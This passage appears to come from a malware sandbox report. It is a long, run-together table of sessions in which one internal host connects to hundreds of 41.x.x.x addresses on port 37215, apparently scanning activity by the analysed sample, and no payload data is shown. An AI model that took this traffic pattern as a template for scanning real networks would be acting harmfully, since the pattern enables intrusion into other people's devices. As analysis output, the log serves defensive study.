                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10324192.168.2.154624241.243.9.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10325192.168.2.155630841.0.123.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10326192.168.2.154137241.83.153.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10327192.168.2.154368441.148.135.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10328192.168.2.153640241.1.158.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10329192.168.2.154128041.226.177.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10330192.168.2.155326441.248.25.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10331192.168.2.156043441.64.84.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10332192.168.2.154491841.160.103.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10333192.168.2.155353841.18.50.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10334192.168.2.154354641.170.6.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10335192.168.2.154688041.205.30.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10336192.168.2.155480441.94.64.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10337192.168.2.155409041.47.220.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10338192.168.2.154751641.104.172.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10339192.168.2.154629841.89.206.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10340192.168.2.155373241.88.130.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10341192.168.2.154846841.168.222.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10342192.168.2.155835041.83.126.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10343192.168.2.153317241.243.63.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10344192.168.2.154552841.76.33.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10345192.168.2.154348441.189.58.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10346192.168.2.154524841.48.80.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10347192.168.2.153315041.30.246.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10348192.168.2.155457641.246.147.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10349192.168.2.153614041.51.73.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10350192.168.2.154639641.99.255.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10351192.168.2.153593441.85.96.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10352192.168.2.154997641.208.171.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10353192.168.2.154575241.43.194.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10354192.168.2.153923241.107.60.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10355192.168.2.155596641.75.62.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10356192.168.2.155971641.202.188.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10357192.168.2.155325441.65.29.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10358192.168.2.154611641.207.173.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10359192.168.2.154094241.69.188.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10360192.168.2.155929841.138.133.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10361192.168.2.155861041.242.243.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10362192.168.2.155228641.75.186.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10363192.168.2.155510441.100.19.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10364192.168.2.153499641.52.205.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10365192.168.2.154442641.233.33.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10366192.168.2.155401041.143.12.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10367192.168.2.156032441.70.164.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10368192.168.2.154356041.171.169.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10369192.168.2.155057041.246.209.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10370192.168.2.155096041.28.243.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10371192.168.2.155464041.147.149.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10372192.168.2.153826641.162.243.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10373192.168.2.155949641.49.196.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10374192.168.2.153953041.245.49.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10375192.168.2.153744641.94.82.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10376192.168.2.153342641.28.253.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10377192.168.2.154424241.115.254.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10378192.168.2.154005641.69.237.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10379192.168.2.155007441.229.186.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10380192.168.2.154188241.29.112.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10381192.168.2.155484841.198.141.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10382192.168.2.155251241.203.82.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10383192.168.2.153949441.190.144.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10384192.168.2.155287641.190.149.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10385192.168.2.153672841.144.229.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10386192.168.2.155216041.169.232.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10387192.168.2.153705441.49.18.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10388192.168.2.155873441.65.132.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10389192.168.2.153695641.27.192.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10390192.168.2.155150041.221.137.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10391192.168.2.154062441.255.139.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10392192.168.2.155201641.226.99.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10393192.168.2.155441241.35.238.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10394192.168.2.154853041.4.220.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10395192.168.2.154210641.162.162.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10396192.168.2.154232441.9.68.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10397192.168.2.154749441.34.69.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10398192.168.2.154758841.99.127.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10399192.168.2.153296641.42.82.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10400192.168.2.153905041.67.97.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10401192.168.2.155382841.104.163.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10402192.168.2.155683241.95.173.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10403192.168.2.153489641.247.157.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10404192.168.2.155432841.151.104.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10405192.168.2.155909841.10.128.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10406192.168.2.153614841.22.204.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10407192.168.2.153677641.154.204.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10408192.168.2.155281641.120.2.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10409192.168.2.155801441.87.100.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10410192.168.2.154326641.194.192.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10411192.168.2.154635241.186.103.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10412192.168.2.153942041.251.206.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10413192.168.2.154000441.192.210.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10414192.168.2.155465641.32.180.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10415192.168.2.155433841.243.84.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10416192.168.2.153706241.225.249.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10417192.168.2.153709041.134.155.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10418192.168.2.153380441.213.165.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10419192.168.2.155490241.251.198.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10420192.168.2.153641641.136.91.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10421192.168.2.154846441.104.213.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10422192.168.2.153483241.157.204.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10423192.168.2.153800041.22.124.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10424192.168.2.154485241.223.68.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10425192.168.2.155426441.120.79.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10426192.168.2.154426441.164.12.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10427192.168.2.153420241.243.243.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10428192.168.2.153286641.1.50.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10429192.168.2.153911441.119.157.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10430192.168.2.155859641.43.96.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10431192.168.2.155691241.76.80.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10432192.168.2.154182441.22.245.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10433192.168.2.155656641.176.131.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10434192.168.2.154930441.123.78.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10435192.168.2.154977641.8.114.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10436192.168.2.154543241.87.20.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10437192.168.2.153761241.250.1.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10438192.168.2.154006241.246.145.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10439192.168.2.154667241.9.140.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10440192.168.2.154398441.45.217.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10441192.168.2.154188441.176.152.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10442192.168.2.154681641.197.251.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10443192.168.2.154834641.48.147.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10444192.168.2.155351441.224.147.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10445192.168.2.154264041.0.58.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10446192.168.2.155851241.136.26.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10447192.168.2.155626241.239.164.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10448192.168.2.153434441.50.139.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10449192.168.2.155908641.56.156.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10450192.168.2.156037441.85.186.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10451192.168.2.156089841.233.224.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10452192.168.2.155680041.220.162.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10453192.168.2.154061841.123.224.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10454192.168.2.154593441.40.153.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10455192.168.2.155673241.44.202.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10456192.168.2.153284641.138.220.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10457192.168.2.153398641.40.238.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10458192.168.2.153492041.24.197.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10459192.168.2.154306841.118.164.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10460192.168.2.155223041.76.83.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10461192.168.2.153345441.153.0.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10462192.168.2.155958041.118.186.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10463192.168.2.153566041.44.123.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10464192.168.2.154448641.224.204.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10465192.168.2.154068241.48.204.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10466192.168.2.155047641.119.80.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10467192.168.2.154089041.246.153.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10468192.168.2.154173041.203.236.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10469192.168.2.154674441.146.127.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10470192.168.2.153623241.88.174.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10471192.168.2.154155241.161.180.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10472192.168.2.153518241.204.171.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10473192.168.2.153435641.151.212.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10474192.168.2.153547241.54.160.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10475192.168.2.153520641.152.197.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10476192.168.2.155035641.250.83.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10477192.168.2.155580441.130.50.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10478192.168.2.155292241.108.43.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10479192.168.2.153672241.202.244.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10480192.168.2.155948041.205.188.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10481192.168.2.153610041.70.85.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10482192.168.2.154631841.250.190.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10483192.168.2.154843441.78.80.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10484192.168.2.154323441.53.230.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10485192.168.2.153908841.201.220.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10486192.168.2.155546441.233.111.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10487192.168.2.153974241.52.96.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10488192.168.2.154053441.71.11.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10489192.168.2.155462441.254.82.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10490192.168.2.155819241.78.139.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10491192.168.2.154733441.122.47.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10492192.168.2.154284041.28.210.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10493192.168.2.153392641.97.125.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10494192.168.2.156051241.158.140.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10495192.168.2.155788441.60.74.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10496192.168.2.154916841.136.101.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10497192.168.2.153878041.89.69.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10498192.168.2.155490641.236.204.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10499192.168.2.154286241.33.83.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10500192.168.2.154611641.81.227.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10501192.168.2.153469441.9.143.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10502192.168.2.154709241.227.104.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10503192.168.2.153547041.36.119.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10504192.168.2.154885841.50.181.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10505192.168.2.155331041.1.127.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10506192.168.2.154233841.166.61.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10507192.168.2.155112641.16.104.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10508192.168.2.155500841.116.93.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10509192.168.2.154805041.141.48.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10510192.168.2.153520641.31.37.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10511192.168.2.153536041.10.92.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10512192.168.2.154581441.242.72.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10513192.168.2.155814641.242.82.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10514192.168.2.153520841.253.115.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10515192.168.2.154249241.150.106.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10516192.168.2.153290841.93.23.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10517192.168.2.154559041.39.45.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10518192.168.2.156066841.70.176.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10519192.168.2.155030241.177.19.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10520192.168.2.153978441.107.113.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10521192.168.2.154546641.13.158.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10522192.168.2.155486441.217.48.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10523192.168.2.154483041.242.69.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10524192.168.2.153555841.115.102.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10525192.168.2.154750641.112.115.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
